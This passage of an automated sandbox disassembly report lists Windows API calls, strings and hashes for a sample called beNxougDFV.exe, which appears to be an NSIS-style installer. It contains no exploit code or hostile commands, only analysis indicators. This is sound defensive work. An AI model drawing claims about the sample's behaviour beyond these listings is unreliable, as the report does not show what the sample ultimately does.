                                        • GetDlgItem.USER32(?,000003F9), ref: 004049EB
                                        • GetDlgItem.USER32(?,00000408), ref: 004049F6
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A40
                                        • LoadBitmapA.USER32(0000006E), ref: 00404A53
                                        • SetWindowLongA.USER32(?,000000FC,00404FCA), ref: 00404A6C
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A80
                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A92
                                        • SendMessageA.USER32(?,00001109,00000002), ref: 00404AA8
                                        • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AB4
                                        • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404AC6
                                        • DeleteObject.GDI32(00000000), ref: 00404AC9
                                        • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404AF4
                                        • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B00
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404B95
                                        • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BC0
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BD4
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404C03
                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C11
                                        • ShowWindow.USER32(?,00000005), ref: 00404C22
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D1F
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404D84
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404D99
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DBD
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404DDD
                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00404DF2
                                        • GlobalFree.KERNEL32(00000000), ref: 00404E02
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404E7B
                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00404F24
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F33
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F53
                                        • ShowWindow.USER32(?,00000000), ref: 00404FA1
                                        • GetDlgItem.USER32(?,000003FE), ref: 00404FAC
                                        • ShowWindow.USER32(00000000), ref: 00404FB3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 1638840714-813528018
                                        • Opcode ID: 5d7cd4127e08cc7e18dc449df1c62f71d17ea125050121c4d20db61d323595a9
                                        • Instruction ID: 4638a2be7f0938753f9a717370e01017d92af631219061991dd3498ab54a35db
                                        • Opcode Fuzzy Hash: 5d7cd4127e08cc7e18dc449df1c62f71d17ea125050121c4d20db61d323595a9
                                        • Instruction Fuzzy Hash: 60027EB0900209AFEF109F54DC85AAE7BB5FB84315F10817AF615BA2E1C7789E42DF58
                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 004044AF
                                        • SetWindowTextA.USER32(00000000,?), ref: 004044D9
                                        • SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 0040458A
                                        • CoTaskMemFree.OLE32(00000000), ref: 00404595
                                        • lstrcmpiA.KERNEL32(: Completed,Mongrelizes31 Setup: Completed), ref: 004045C7
                                        • lstrcatA.KERNEL32(?,: Completed), ref: 004045D3
                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004045E5
                                          • Part of subcall function 0040562F: GetDlgItemTextA.USER32(?,?,00000400,0040461C), ref: 00405642
                                          • Part of subcall function 00406199: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\beNxougDFV.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004061F1
                                          • Part of subcall function 00406199: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004061FE
                                          • Part of subcall function 00406199: CharNextA.USER32(?,"C:\Users\user\Desktop\beNxougDFV.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406203
                                          • Part of subcall function 00406199: CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406213
                                        • GetDiskFreeSpaceA.KERNEL32(0041ECD8,?,?,0000040F,?,0041ECD8,0041ECD8,?,00000001,0041ECD8,?,?,000003FB,?), ref: 004046A3
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046BE
                                          • Part of subcall function 00404817: lstrlenA.KERNEL32(Mongrelizes31 Setup: Completed,Mongrelizes31 Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404732,000000DF,00000000,00000400,?), ref: 004048B5
                                          • Part of subcall function 00404817: wsprintfA.USER32 ref: 004048BD
                                          • Part of subcall function 00404817: SetDlgItemTextA.USER32(?,Mongrelizes31 Setup: Completed), ref: 004048D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: : Completed$A$C:\Users\user\AppData\Local\unshabbily$Mongrelizes31 Setup: Completed
                                        • API String ID: 2624150263-1557839200
                                        • Opcode ID: ef32ee5c924519dd82d117a465dafaf8dcd4de5cfa9c843c3c8ed1b6bd1752c3
                                        • Instruction ID: 5dd75e317128adb7bedb8be6abecdb1ea93c725c3d3faa56fa834c848e6f6950
                                        • Opcode Fuzzy Hash: ef32ee5c924519dd82d117a465dafaf8dcd4de5cfa9c843c3c8ed1b6bd1752c3
                                        • Instruction Fuzzy Hash: 4BA19FF1900209ABDB11AFA5CC45BAFB7B8EF85314F10843BF611B62D1DB7C99418B69
                                        APIs
                                        • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040214D
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021FC
                                        Strings
                                        • C:\Users\user\AppData\Local\unshabbily, xrefs: 0040218D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Local\unshabbily
                                        • API String ID: 123533781-4280797776
                                        • Opcode ID: e3b45c08e4ce457a64ba278d5508bdaa5c8a437ab77814b71e65f4811fac46df
                                        • Instruction ID: 27b6dc01e21a21dcf175964b2ce54e528eb66c3f275abda499c4f6713b6e0615
                                        • Opcode Fuzzy Hash: e3b45c08e4ce457a64ba278d5508bdaa5c8a437ab77814b71e65f4811fac46df
                                        • Instruction Fuzzy Hash: 355136B5A00208BFCF10DFE4C988A9DBBB5EF48314F2045AAF915EB2D1DA799941CF54
                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402707
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 86462296798bcc5c7116dc0b8927a48604f8bac83b6720eb84ded3fe255ec0fc
                                        • Instruction ID: 8315facf8ced128c6c50566814b57074d619fda0e5ca52ae4c33e0c7423f4127
                                        • Opcode Fuzzy Hash: 86462296798bcc5c7116dc0b8927a48604f8bac83b6720eb84ded3fe255ec0fc
                                        • Instruction Fuzzy Hash: E8F0ECB2704111AFD710EB749D49AFE7778DB11324F20057BE645F20C1D6B88A45DB2A
                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C4
                                        • GetDlgItem.USER32(00000000,000003E8), ref: 004041D8
                                        • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F6
                                        • GetSysColor.USER32(?), ref: 00404207
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404216
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404225
                                        • lstrlenA.KERNEL32(?), ref: 00404228
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404237
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040424C
                                        • GetDlgItem.USER32(?,0000040A), ref: 004042AE
                                        • SendMessageA.USER32(00000000), ref: 004042B1
                                        • GetDlgItem.USER32(?,000003E8), ref: 004042DC
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040431C
                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040432B
                                        • SetCursor.USER32(00000000), ref: 00404334
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 0040434A
                                        • SetCursor.USER32(00000000), ref: 0040434D
                                        • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404379
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040438D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: : Completed$N
                                        • API String ID: 3103080414-2140067464
                                        • Opcode ID: feecafc40baf01a00ddfc5a4ad2d6f47f6ba1c3b7388df2095feb28ad013f924
                                        • Instruction ID: 7162b40555158b22622c6e9d00efc6f9eaf6d98589edfbec15a783eb0e256f30
                                        • Opcode Fuzzy Hash: feecafc40baf01a00ddfc5a4ad2d6f47f6ba1c3b7388df2095feb28ad013f924
                                        • Instruction Fuzzy Hash: 4E61A4B1A40205BFDB109F61CD45F6A7B69FB84704F00803AFB05BA2D1C7B8A951CF99
                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F
                                        • API String ID: 941294808-1304234792
                                        • Opcode ID: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
                                        • Instruction ID: d756f8073455ec7f94eaaa006bac723f94b68f9cc4de0a6a70f3062e944f429a
                                        • Opcode Fuzzy Hash: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
                                        • Instruction Fuzzy Hash: 6E419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D2F,?,?), ref: 00405BCF
                                        • GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405BD8
                                          • Part of subcall function 00405A2D: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A3D
                                          • Part of subcall function 00405A2D: lstrlenA.KERNEL32(00000000,?,00000000,00405C88,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A6F
                                        • GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405BF5
                                        • wsprintfA.USER32 ref: 00405C13
                                        • GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405C4E
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C5D
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C95
                                        • SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEB
                                        • GlobalFree.KERNEL32(00000000), ref: 00405CFC
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D03
                                          • Part of subcall function 00405AC8: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00405ACC
                                          • Part of subcall function 00405AC8: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %s=%s$[Rename]
                                        • API String ID: 2171350718-1727408572
                                        • Opcode ID: fa16ef9a339b69213ae22a03f48f65898cca3967a232a53d2c4426af25c81478
                                        • Instruction ID: 318577f01edad599db78de103440226658cd26d488467381f1a5ad924793321f
                                        • Opcode Fuzzy Hash: fa16ef9a339b69213ae22a03f48f65898cca3967a232a53d2c4426af25c81478
                                        • Instruction Fuzzy Hash: DC311331605B196BD2206B65AC49F6B3A6CDF45754F14053BFA01F72D2E63CAC018EBD
                                        APIs
                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\beNxougDFV.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 004061F1
                                        • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004061FE
                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\beNxougDFV.exe",774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406203
                                        • CharPrevA.USER32(?,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000,00403196,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 00406213
                                        Strings
                                        • *?|<>/":, xrefs: 004061E1
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040619A
                                        • "C:\Users\user\Desktop\beNxougDFV.exe", xrefs: 004061D5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\beNxougDFV.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-2565611603
                                        • Opcode ID: cc2015c7b969e01208aad92a9e3b8c758494e26085fc8624e700c096258e22ae
                                        • Instruction ID: ca9b47fb282156c43c251839f6001ffd27a0cb8481c2ab4f175210ee2844123a
                                        • Opcode Fuzzy Hash: cc2015c7b969e01208aad92a9e3b8c758494e26085fc8624e700c096258e22ae
                                        • Instruction Fuzzy Hash: 0911046180839169FB3216244C44B7B7F898F5B760F1A44BFE8D6722C3C67C5C62866E
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EB), ref: 00404074
                                        • GetSysColor.USER32(00000000), ref: 00404090
                                        • SetTextColor.GDI32(?,00000000), ref: 0040409C
                                        • SetBkMode.GDI32(?,?), ref: 004040A8
                                        • GetSysColor.USER32(?), ref: 004040BB
                                        • SetBkColor.GDI32(?,?), ref: 004040CB
                                        • DeleteObject.GDI32(?), ref: 004040E5
                                        • CreateBrushIndirect.GDI32(?), ref: 004040EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                        • Instruction ID: becbdb48d67c78dbb8c9c091cdbe424430cb8bef044b76b3398d9101d9dbd489
                                        • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                        • Instruction Fuzzy Hash: 86215071904704ABCB219F68DD48B4BBBF8AF41714B048A29EA96B26E0C734E904CB65
                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040493C
                                        • GetMessagePos.USER32 ref: 00404944
                                        • ScreenToClient.USER32(?,?), ref: 0040495E
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404970
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404996
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                        • Instruction ID: 39a8229da7402e88b879503ea9069683dc6a956defdeaab739565ccd09fe5115
                                        • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                        • Instruction Fuzzy Hash: F3014071D00219BADB01DBA4DC85FFFBBBCAF55711F10412BBA11B61C0D7B869058BA5
                                        APIs
                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                                        • MulDiv.KERNEL32(0008064E,00000064,00080652), ref: 00402CA7
                                        • wsprintfA.USER32 ref: 00402CB7
                                        • SetWindowTextA.USER32(?,?), ref: 00402CC7
                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD9
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402CB1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
